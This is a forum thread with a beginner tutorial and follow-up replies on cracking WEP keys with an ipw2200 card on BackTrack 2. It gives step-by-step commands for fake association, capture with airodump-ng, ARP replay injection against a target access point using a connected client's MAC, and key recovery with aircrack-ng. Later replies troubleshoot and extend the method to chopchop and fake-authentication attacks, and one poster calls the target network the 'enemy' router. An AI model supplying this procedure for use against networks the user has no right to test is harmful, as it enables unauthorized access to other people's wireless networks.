Basic injection with ipw2200 and BackTrack v2 for beginners

[blinco]

Here's a quick guide for anyone trying to get injection working on an ipw2200 with BackTrack 2. This is intended for first-time aircrack-ng users, so it will only detail the most basic procedure. You can find more complicated guides with troubleshooting for some of the more complicated access points in other threads.

I will be demonstrating a simple WEP crack using ARP request replay. Please also read the newbie guide first so that you generally know what you are doing.

** This tutorial is for open authenticted networks only. Shared key authentication is more complicated. **

By the way: if you are very new to linux, selecting text in the terminal window (with the mouse) will automatically copy it, and clicking both mouse buttons at the same time will paste. You can stop any aircrack programs with ctrl+c. To see the history of the terminal window, you can scroll with shift+pageUp/pageDown.

BackTrack 2 supports ipw2200 injection out of the box, but there are some limitations. Injection is slightly more complex when using the ipw2200 as opposed to other cards - you have to use different interfaces to inject and monitor. You can only use the following aireplay-ng attacks with the ipw2200:
   2 (--interactive)
   3 (--arpreplay)
   4 (--chopchop)

You will need the following information first. You can find access point details using: "iwlist eth1 scan" after you log into BackTrack.:
   Access point bssid
   Access point channel

==================

0. (optional) The aircrack-ng team has done such a great job lately that there have been 2 releases since BackTrack 2. So the first thing that you should do is update aircrack-ng to v0.9. You should start backtrack connected to a LAN so that you can download the updates.
   wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
   tar -zxvf aircrack-ng-0.9.tar.gz
   cd aircrack-ng-0.9
   make
   make install

1. Enable the rtap0 interface.
   rmmod ipw2200
   modprobe ipw2200 rtap_iface=1

2. Make a 'dummy' connection to the access point. You don't need to know the key at this stage - we just make up a fake one ("fakekey"). This step is required because of a limitation in the ipw2200 driver. ipw2200 must be in managed mode and connected to an access point before it will work with aireplay-ng.
   iwconfig eth1 ap <access point bssid>
   iwconfig eth1 key s:fakekey
   iwconfig eth1 mode managed

3. Bring up the interfaces:
   ifconfig eth1 up
   ifconfig rtap0 up

3a. Optional: at this point, you can type "iwconfig" to see if the dummy connection from step 2 has worked. The connection details will be listed beside the "eth1" interface.

4. Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.
   airodump-ng --channel <Access Point channel> --bssid <Access Point bssid> -w dumpfile rtap0

4a. After a few seconds in airodump-ng, you should notice that there are clients connected to the access point (they will be listed under "STATION"). Take note of the MAC address of one of the clients. You will use it in the next step.

5. Open another terminal window. Run an ARP replay attack. Note the commands at the end of the line ("-i rtap0 eth1") which tell aireplay-ng to listen on rtap0 and inject on eth1. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.
   aireplay-ng --arpreplay -b <Access Point bssid> -h <client MAC addr. from step 4a> -i rtap0 eth1

6. Wait a few minutes until the #Data reaches 100 000 (if you updated in step 0), or 1 000 000 (if you did not update in step 0). This should be more than enough, but we leave the attack running just in case.

7. Open another terminal window and run aircrack-ng.

• If you did not update aircrack-ng in step 0, you will need 1 000 000 IVs, and will have to run aircrack-ng without -z:
     aircrack-ng -b <Access Point bssid> dumpfile*.cap
• If you did update in step 0, you can use the PTW attack (-z option). Aircrack should say that it is processing approx. 100 000 IVs. If this number is low (less than 1000), there is some problem with your injection attack. Aircrack will then display "Key Found". You should know what to do after that.
     aircrack-ng -z -b <Access Point bssid> dumpfile*.cap

You should now have the key.

==================

Please let me know if there is anything that you think I should change about this tutorial to make it easier. Also, if anyone wants to take it further and publish it on the wiki, you are more than welcome to.


David.

[pad]

Hiho,


good work. but one little thing was confusing me. just tested ur tut, and it works fine. But i think that u dont need the mac of your OWN ipw2200 wifi card. i think u must use the mac adress of the enemys wifi card, because when the mac filter is enabled on the enemys router, he wouldnt answer to the packet's that you are sending. ^^ iam not a wlan cracking noob, on the normal way iam using ubuntu with aircrack 0.9 and a netgear 511t wifi card   just tested this tut, because i have an samsung laptop with an integrated ipw2200bg card


sry for my bad english

[Kblair7]

Everytime I attempt injection I get this error ...any help would be great

thanks!



bt aircrack-ng # dir
AUTHORS          Makefile.OpenBSD  aircrack-ng*  airtun-ng*  packages/
ChangeLog        Makefile.cygwin   airdecap-ng*  evalrev*    packetforge-ng*
INSTALLING       Makefile.osx      aireplay-ng*  ivstools*   patches/
LICENSE          Makefile.other    airmon-ng     kstats*     src/
Makefile         README            airodump-ng*  makeivs*    test/
Makefile.NetBSD  VERSION           airoscript/   manpages/
bt aircrack-ng # patches
-bash: patches: command not found
bt aircrack-ng # patches/
-bash: patches/: is a directory
bt aircrack-ng # airmon-ng


Interface       Chipset         Driver

eth1            Centrino b/g    ipw2200

bt aircrack-ng # airmon-ng start eth1 monitor mode


Interface       Chipset         Driver

eth1            Centrino b/g    ipw2200 (monitor mode enabled)

bt aircrack-ng # clear
bt aircrack-ng # cd /root
bt ~ # cd /pentest/wireless/aircrack-ng
bt aircrack-ng # rmmod ipw2200
bt aircrack-ng # modprobe ipw rtap_iface= 2
FATAL: Error inserting ipw (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng # modprobe ipw rtap_iface= 1
FATAL: Error inserting ipw (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng #

[blinco]

@Pad:  Thanks for the feedback. I will update the original post with instructions for active clients.

@Kblair7: I think you have some trouble with this line: "modprobe ipw rtap_iface=1". I am not sure what module "ipw" is, but you should be using ipw2200 because that is what you removed. So, you should be entering this: "modprobe ipw2200 rtap_iface=1"

[kblair7]

Thanks I will try, I am kind of new to linux command structure...I am used to dos tree so file-system is actually better but hard to get used to.

Thanks for the help I will continue to try

[kblair7]

Ok I tried that but I am still getting a fatal error when I attempted the steps above.

bt aircrack-ng # clear
bt aircrack-ng # cd /root
bt ~ # cd /pentest/wireless/aircrack-ng
bt aircrack-ng # rmmod ipw2200
bt aircrack-ng # modprobe ipw2200 rtap_iface= 2
FATAL: Error inserting ipw2200(/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw2200.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng # modprobe ipw rtap_iface= 1
FATAL: Error inserting ipw2200 (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw2200.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng #

[blinco]

Hi,

I think you still have some problems with these lines:
   modprobe ipw2200 rtap_iface= 2
   modprobe ipw rtap_iface= 1

You only need the second line, and it looks like you have a space between = and 1. It should be like this:
   modprobe ipw2200 rtap_iface=1

Also, you don't actually need these:
   cd /root
   cd /pentest/wireless/aircrack-ng
Aircrack-ng is in the path, so you don't need to be in that directory to run it. You can run it from anywhere.


See how you go with these commands.


David.

[kblair7]

Thanks that worked..

However...my problem now is with

aircrack-ng -z -b <Access Point bssid> dumpfile*.cap

It doesn't allow option z
tells me it doesn't exist

oh well...

thanks for all the help!

-k

[Mister_X]

it doesn't exist. This option was introduced in 0.9 and backtrack contains a version in the middle of 0.7 and 0.8.

[blinco]

kblair7,

You can use aircrack-ng without -z, but then you will need 1 000 000 IVs instead of 100 000. The reason that you can't use the -z option is because you didn't do step 0 (update aircrack-ng suite to v0.9).

I have updated the tutorial now, so you have a choice if you want to update aircrack-ng to v0.9 or not.


David.

[Attacker87]

This is a really good tut for ipw2200 cards. Good Job 

[willpower101]

Could you explain a bit about how this interface is working and if it could be used to to do a fakeauth or similar attack on an ap that wasn't showing any wireless clients? Is it makeing the card associate with it's own ghost ap, similar to if you had an open router sitting near you to use?

[blinco]

@Attacker87:
Thanks. I think it's important to have a good/simple ipw2200 tutuorial because of the number of laptops with this card built in. It's probably the most common card out there if you think about all of the centrino laptops that have been made over the last few years.
If you can think of any ways that I can make this tutorial easier, let me know. I am trying to keep it as easy as possible so that the newbies can follow the tutorial instead of asking us what the next step is


@willpower101:
The ipw2200 will only work with interactive/arpreplay/chopchop attacks, so you can't use it to do fake authentication or deauthentication.
The reason that you have to associate to the access point in step 2 is because of a limitation in the ipw2200 driver: the ipw2200 can only inject when it is in managed mode, connected to an access point, and on the same channel as your target access point. You could put the card in managed mode and connect to any access point on the same channel. To keep the tutorial simple, I have used the same access point and a fake key - this will work every time where as finding another access point is a bit more complicated.
You have to use 2 interfaces also because of limitations in the ipw2200 driver.

[willpower101]

can this be successfully used in conjunction with this guide abouthttp://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients to capture and inject packets with the chopchop attack when there are no wireless clients on the network?

So far i modied several of the commands in that guide to -i etap0 eth0 and it seems to work.
i can capture a packet with chopchop and decode it with my wep key.
after i inject with -2 -r arp-request, the data# climbs.

[edit] seems to work fine. i realized i was decrypting the wrong cap file!

[blinco]

Yes, I think it will work if the authentication method of the AP is set to 'open' - step 2 actually authenticates with the AP, but any data that is sent/received would be scrambled because you have enetered the wrong key. With shared authentication, it would probably not work because you need the key before you can authenticate with the AP.

The developers may be able to confirm if using the linux wireless tools is the same as using fake authentication against an open-authentication network.
Does anyone know if this:
   iwconfig ath0 bssid <ap bssid>
   iwconfig ath0 essid <ap essid>
   iwconfig ath0 key s:fakekey
will achieve the same result as this:
   aireplay-ng --fakeauth 0 -e <ap essid> -a <ap bssid> -h <ath0 mac address> ath0